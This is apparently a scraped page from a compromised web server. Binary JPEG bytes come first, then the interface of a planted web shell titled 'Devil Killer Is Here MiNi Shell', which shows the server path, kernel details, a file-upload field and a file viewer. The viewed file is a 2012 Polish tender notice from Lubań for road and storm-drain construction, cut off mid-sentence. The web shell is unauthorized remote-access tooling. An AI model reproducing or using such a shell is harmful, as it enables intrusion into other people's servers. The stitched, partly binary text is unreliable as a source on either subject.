JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121130/483256-N-2012.html

<p class="kh_header"><b>Lubań: BUDOWA DRÓG WEWNĘTRZNYCH NA TERENIE OSIEDLA MIESZKANIOWEGO - OSIEDLE FABRYCZNA W LUBANIU - II ETAP</b><br>
<b>Numer ogłoszenia: 483256 - 2012; data zamieszczenia: 30.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Lubań , ul. 7 Dywizji 14, 59-800 Lubań, woj. dolnośląskie, tel. 075 6464400, faks 075 6464405.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.luban.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BUDOWA DRÓG WEWNĘTRZNYCH NA TERENIE OSIEDLA MIESZKANIOWEGO - OSIEDLE FABRYCZNA W LUBANIU - II ETAP.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> BUDOWA DRÓG WEWNĘTRZNYCH NA TERENIE OSIEDLA MIESZKANIOWEGO - OSIEDLE FABRYCZNA W LUBANIU - II ETAP
Budowę odcinka ulicy Agatowej od skrzyżowania z ulicą Rubinową  do końca zabudowy szeregowej przy tej ulicy (działki gruntowej nr 5/29) długości 148,00 m i szerokości 6,0 m oraz budowę odcinka ulicy Rubinowej - od skrzyżowania z drogą gminną ulicą Szafirową do skrzyżowania z ulicą Agatową - długości 139,20 m i szerokości 6,0 m.
Konstrukcję jezdni zamknięta będzie krawężnikiem betonowym wtopionym z uwagi na występującą na całej długości jezdni ilość zjazdów na graniczące z jezdnią posesję. Nawierzchnię na odcinkach ulic przewidzianych do budowy w I etapie planuje się jako bitumiczną - warstwa wiążąca gr. 4 cm,  na dwuwarstwowej podbudowie kamiennej z mieszanek kamiennych i warstwie odcinającej z piasku. Do czasu budowy chodników pobocze po lewej i prawej stronie jezdni za krawężnikami przewiduje się uzupełnić warstwą humusu na szerokości 0,5 mb po każdej stronie i grubości 10 cm. 
Spadek poprzeczny pobocza jednostronny 2-6%.
Dodatkowo z uwagi na niski poziom wód gruntowych konstrukcję jezdni przewiduje się zabezpieczyć poprzez wykonanie obustronnego drenażu opaskowego rurkami NPCW o podsypce i obsypce ze żwiru płukanego wraz z włączeniem go w istniejącą kanalizację deszczową.
Profil osi jezdni planowanych do budowy odcinków dróg dostosowano do istniejącej niwelety ulicy Rubinowej oraz dowiązano do rzędnych terenu. Spadki podłużne niwelety zaprojektowano w przedziale od 0,40 do 8,07%.
Przekroje konstrukcyjne planowanych do budowy odcinków dróg - ulic przyjęto jak dla drogi kategorię ruchu KR1.
Szerokość jezdni 6,0 m.
Spadki poprzeczne jezdni dwustronne o wartości 2%.
Konstrukcja jezdni do wykonania w ramach I etapu realizacji zadania, po wcześniejszych robotach ziemnych związanych z niwelacja terenu w obrębie pasa drogowego i wykonaniem koryta głębokości 50 cm z wywozem urobku oraz wyprofilowaniem i zagęszczeniem dna wykopu pod warstwy konstrukcyjne jezdni, przedstawia się następująco:
Warstwa wiążąca z mieszanki mineralno - asfaltowej gr. 4 cm
Górna warstwa podbudowy z kruszywa łamanego 0-31,5 mm gr. 10 cm
Dolna warstwa podbudowy z kruszywa łamanego 0-63 mm gr. 20 cm
Warstwa odcinająca z piasku gr. 15 cm.
Konstrukcję nawierzchni jezdni ograniczona będzie krawężnikiem betonowym najazdowym 15x22x100 cm na ławie betonowej C12/15 z oporem.
Krawężnik posadowiony na wysokości +8 cm od planowanej do wykonania w I etapie robót warstwy wiążącej nawierzchni jezdni.
UWAGA:
Krawężnik stanowi materiał Zamawiającego i zostanie dostarczony Wykonawcy do wbudowania bezpośrednio na plac budowy.
ODWODNIENIE
Wody opadowe z powierzchni jezdni dróg planowanych do budowy w I etapie odprowadzane będą poprzez nadanie jej stosownych spadków poprzecznych i podłużnych do istniejącej miejskiej sieci kanalizacji deszczowej. W ramach objętych zamówieniem robót planuje się wybudowanie na istniejącej sieci kanalizacji deszczowej dodatkowych studni inspekcyjnych fi425 umiejscowionych na istniejącej sieci kanalizacji deszczowej fi315 mm zlokalizowanej w ul. Rubinowej oraz przykanałów z rur PVC fi200 mm i wpustów ulicznych z rur betonowych fi500 mm z osadnikiem. Wpusty należy zamknąć włazami żeliwnymi typu ciężkiego zamykanymi na zamek.
Nowo budowany odcinek kanalizacji deszczowej w części ulicy Agatowej należy wykonać z rur SDR-34 klasy S fi200 PCV do kanalizacji zewnętrznej, łączonych przy pomocy uszczelek wargowych. Na sieci budowanego odcinka kanalizacji deszczowej i istniejącej w ulicy Rubinowej sieci kanalizacji deszczowej należy wybudować studnie kanalizacyjne z kręgów betonowych fi1200 łączonych między sobą za pomocą uszczelek gumowych i typowe inspekcyjne fi425. Studnie betonowe należy przykryć pokrywową płytą żelbetową z otworem. Studnie zlokalizowane w jezdni należy przykryć włazem żeliwnym typu ciężkiego 40T, a studnie zlokalizowane poza jezdnia należy przykryć włazami żeliwnymi typu lekkiego 12,5T. Przejście kanałów przez ścianki studni rewizyjnych i wpustów ulicznych betonowych należy wykonać jako szczelne w stopniu uniemożliwiającym infiltrację wody gruntowej i eksfiltrację ścieków. Przejścia przez te ściany należy wykonać w oryginalnych tulejach przejściowych PCV z uszczelką gumową osadzonych w otworach w ścianach studzienki.
Studnie należy posadowić na podsypce piaskowej grubości 0,30mm oraz podstawie betonowej grubości 0,15m. Elementy betonowe studni istniejących należy zewnętrznie dwukrotnie zaizolować warstwą bitumiczną, a od wewnątrz ewentualne ubytki i spoiny kręgów wyspoinować zaprawą wodoszczelną. Zabrania się wykonywania izolowania studni od wewnątrz.
Wykop do wysokości 30cm powyżej wierzchu przewodów włączonych do studzienek oraz co najmniej 50 cm wokół ścian na całej wysokości studni, należy zasypać piaskiem. Pozostałą część wykopu zasypać gruntem rodzimym, a w jezdniach dokonać wymiany gruntu. Grunt i materiał dowożony na wymianę należy zagęszczać warstwami grubości 15 cm przy zagęszczaniu ręcznym i 30 cm przy zagęszczaniu mechanicznym.
Odcinki kolektora na całej długości oraz podejścia pod wpusty i odwodnienie okolicznych posesji należy połączyć poprzez rury SDR-34 klasy S fi200 PCV do kanalizacji zewnętrznej, łączonych przy pomocy uszczelek wargowych. Kanały należy układać w gotowym wykopie na 15 cm podsypce piasku oraz wykonać warstwę obsypkową o grubości 30cm ponad wierzch przewodu. Następnie należy wykonać zasyp przewodu gruntem rodzimym oczyszczonym z elementów skalistych, grud i kamieni, a odcinki zlokalizowane w jezdni materiałem przewidzianym do wymiany gruntu. Zagęszczenie gruntu i materiału dostarczanego do wymiany gruntu w jezdniach należy wykonać warstwami. Każda warstwa powinna być zagęszczona do wskaźnika zagęszczenia o wartości 0,98. Grubość warstw nie powinna być większa niż: 0,15m przy zagęszczaniu ręcznym i 0,3m przy zagęszczaniu mechanicznym. Przy zagęszczaniu należy zachować optymalną wilgotność gruntu.
UWAGA: W jezdni pasa drogowego ul. Agatowej i ul. Rubinowej przewidziano, w ramach wykonywanych robót instalacyjnych, całkowitą wymianę gruntu na mieszankę kamienną.
Spadki oraz rzędne dna rur oraz rzędne studni rewizyjnych i wpustów ulicznych należy wykonać zgodnie z projektem.
Po wykonaniu kolejnych odcinków sieci, przed zasypaniem poddać ją próbom szczelności i przepustowości zgodnie z PN92/B10735 na infiltracje oraz dokonać odbiorów częściowych przy udziale nadzoru inwestycyjnego i wykonawcy.
Podczas realizacji robot inwestycyjnych należy dostosować rzędne włazów studni i wpustów ulicznych do rzędnych nawierzchni jezdni i terenu.
Roboty ziemne przy robotach instalacyjnych.
Wykopy pod roboty instalacyjne należy wykonać o ścianach pionowych. Wykopy należy wykonywać sprzętem mechanicznym, a w miejscu zbliżenia do kolizji z urządzeniami obcymi w odległości 1,0 m wykopy należy prowadzić ręcznie. Napotkane na trasie przewody lub kable winny być zabezpieczone przed uszkodzeniem, a w razie potrzeby podwieszone w sposób zapewniający ich eksploatację.
Zabezpieczenie ścian wykopów należy zastosować wówczas gdy głębokość wykopu będzie większa niż 1,5m. Wykopy należy zabezpieczyć wypraskami stalowymi i rozporami. Zabezpieczenie wykopów powinno wystawać co najmniej 0,15m nad teren.
Szerokość wykopu powinna być dostosowana do średnicy układanego przewodu, a dla średnicy 200mm wynosi co najmniej 1,0m. Odległość pomiędzy obudową wykopu, a zewnętrzną ścianką rury z każdej strony powinna wynosić co najmniej 30 cm.
Zasypywanie i zagęszczanie wykopów i zasypki przy robotach instalacyjnych.
Wykop należy zasypać warstwami 0,15 m przy ręcznym zagęszczeniu poprzez ubijanie gruntu zasypowego po obu stronach wykopu.
Grubość warstwy zagęszczonej nie powinna być większa od 0,3 m przy zagęszczaniu warstwy gruntu przy użyciu sprzętu mechanicznego lżejszego, takiego  jak wibratory i ubijaki mechaniczne do 200 kG.
Szczególną uwagę należy zwrócić na zagęszczanie gruntu przy studniach kanalizacyjnych w promieniu 2,0 m.
Przy zagęszczaniu wykopów należy osiągnąć wskaźnik zagęszczenia zgodny z PN-74/B-02380, który dla terenów pod jezdnią drogi wykosi Js = 1,00, a poza jezdnią Js=0,98.
ROBOTY TOWARZYSZĄCE BUDOWIE DRÓG.
Przed ułożeniem warstwy wiążącej z masy bitumicznej nawierzchni jezdni należy wyregulować do jej poziomu po zagęszczeniu wszystkie urządzenia obce zlokalizowane w jezdni dróg - obudowy zaworów i zasuw oraz włazy studni kanalizacyjnych, a także przebudować w ul. Agatowej 2 kominy włazowe studni kanalizacyjne poprzez demontaż jednego kręgu betonowego oraz ponowne zamontowanie płyty nastudziennej i włazu żeliwnego pochodzącymi z wcześniejszego demontażu.
Planowane do wykonania roboty drogowo - instalacyjne nie wymagają wycinki drzew ani krzewów.
Powierzchnie elementów podlegających budowie w I etapie:
- jezdnia - 1955,37 m2
Długości elementów liniowych i innych do budowy i przebudowy w I etapie:
- krawężniki najazdowe - 533,20 mb
- remont studni rewizyjnych - 2 szt.
- drenaż opaskowy jezdni - 576,00 mb
Kanalizacja deszczowa nowa oraz uzupełnienie urządzeń w istniejącej kanalizacji deszczowej:
- kanał deszczowy z rur PVC fi 200 mm - 137,35 mb
- studnie rewizyjne fi 1200 mm do przebudowy - 2 kpl.
- studnie inspekcyjne PVC fi 425 mm - 7 kpl.
- przykanały wpustów deszczowych  z rur PVC fi200 mm  - 103,30 mb
- wpusty deszczowe typowe uliczne z osadnikiem - 12 kpl.
DŁUGOŚĆ DRÓG - ULIC PRZEWIDZIANYCH DO BUDOWY W I ETAPIE, WYNOSI:
1. ULICA RUBINOWA - 139,20 MB.
2. ULICA AGATOWA - 148,00 MB..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza udzielenie zamówienia uzupełniającego w trybie zamówienia z wolnej ręki - na zasadach określonych w art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.31.23-7, 45.23.24.11-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy Wykonawca zobowiązany jest zabezpieczyć swoją ofertę wadium w wysokości 7.500,00 zł (słownie: siedem tysięcy pięćset złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia w/w warunku udziału w postępowaniu dokonywana będzie w oparciu o złożone przez Wykonawcę oświadczenie o spełnienie warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni udokumentować posiadanie wiedzy i doświadczenia poprzez wykazanie, że w okresie ostatnich 5 lat przed upływem terminu składania ofert 
(a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) wykonali zgodnie ze sztuką budowlaną i prawidłowo ukończyli, co najmniej trzy roboty budowlane o wartości minimum 250.000,00 złotych brutto.
Warunek będzie spełniony jeżeli Wykonawca wykaże, że zakres robót wykazanych przez Wykonawcę obejmował między innymi roboty związane z budową lub przebudową dróg, ulic z użyciem mas bitumicznych, kostki betonowej i kamiennej oraz budowę lub przebudowę instalacji kanalizacji deszczowej.
Ocena spełnienia w/w warunku udziału w postępowaniu dokonywana będzie 
w oparciu o złożone przez Wykonawcę:
a)wykaz robót budowlanych w zakresie niezbędnym do wykazania spełnienia warunku (wiedzy i doświadczenia), wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania - sporządzony przez Wykonawcę samodzielnie lub z wykorzystaniem załącznika Nr 4A do niniejszej Instrukcji dla Wykonawcy,
b)dokumenty potwierdzające, że wymienione w wykazie roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (np.: referencje, listy polecające, opinie inspektora nadzoru, protokół odbioru robót itp.);
c)oświadczenie o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia w/w warunku udziału w postępowaniu dokonywana będzie w oparciu o złożone przez Wykonawcę oświadczenie o spełnienie warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni udokumentować dysponowanie niżej wymienionymi osobami, które będą uczestniczyć w wykonywaniu zamówienia: 
- kierownik budowy posiadający odpowiednie wykształcenie techniczne i praktykę
- kierownik robót posiadający odpowiednie wykształcenie techniczne i praktykę zawodową potwierdzone uprawnieniami budowlanymi w specjalności:
a) instalacji sanitarnych;
Ocena spełnienia w/w warunku udziału w postępowaniu dokonywana będzie w oparciu o złożone przez Wykonawcę:
a)wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności, oraz informacją o podstawie do dysponowania tymi osobami - sporządzony przez Wykonawcę samodzielnie lub z wykorzystaniem załącznika  Nr 4B do Instrukcja dla Wykonawcy,
b)oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia  (wymienione w wykazie osoby) posiadają wymagane uprawnienia - sporządzony przez Wykonawcę samodzielnie lub z wykorzystaniem załącznika Nr 4C do Instrukcja dla Wykonawcy. Zamawiający nie wymaga kserokopii uprawnień i zaświadczeń o przynależności do właściwej izby samorządu zawodowego. 
c)oświadczenie o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni udokumentować ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę równą lub wyższą niż 500.000 zł. Ocena spełnienia w/w warunku udziału w postępowaniu dokonywana będzie w oparciu o złożone przez Wykonawcę:
a)opłaconą polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę równą lub wyższą niż 500.000 zł. Jeżeli z treści polisy nie wynika fakt jej opłacenia do oferty należy dołączyć dokument potwierdzający opłacenie polisy, 
b)oświadczenie o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)Formularz Oferty, sporządzony zgodnie ze wzorem stanowiącym załącznik Nr 1 do niniejszej Instrukcji dla Wykonawcy bądź też przygotowany przez Wykonawcę w treści zgodnej z niniejszą Instrukcją
2)Kosztorys ofertowy uproszczony sporzadzony w oparciu o przedmiar robót i Specyfikację techniczną wykonania i odbioru robót - załączone do SIWZ wraz z podaniem ceny roboczogodziny, czynników cenotwórczych i narzutów jakie stosował oferet przy wyliczaniu kosztorysu ofertowego. Zamawiajacy zaleca aby Oferent załączył kosztorysy ofertowe w wersji elektronicznej na płycie CD
3)stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z  właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej
4)w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu 
o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego
5)zobowiązanie innych podmiotów wskazanych w ofercie do współpracy lub oddania mu do dyspoozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (jeżeli dotyczy)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art.144 u.p.z.p. Zamawiający dopuszcza zmiany postanowień umowy w a)wystąpieniem okoliczności niemożliwych do przewidzenia, przez zamawiającego i doświadczonego wykonawcę przed podpisaniem umowy,
d)rezygnacją z części prac, ograniczenia zakres umowy podstawowej w sytuacji, gdy zmiany te będą korzystne dla zamawiającego.
2)zmiana terminu wykonania zamówienia:
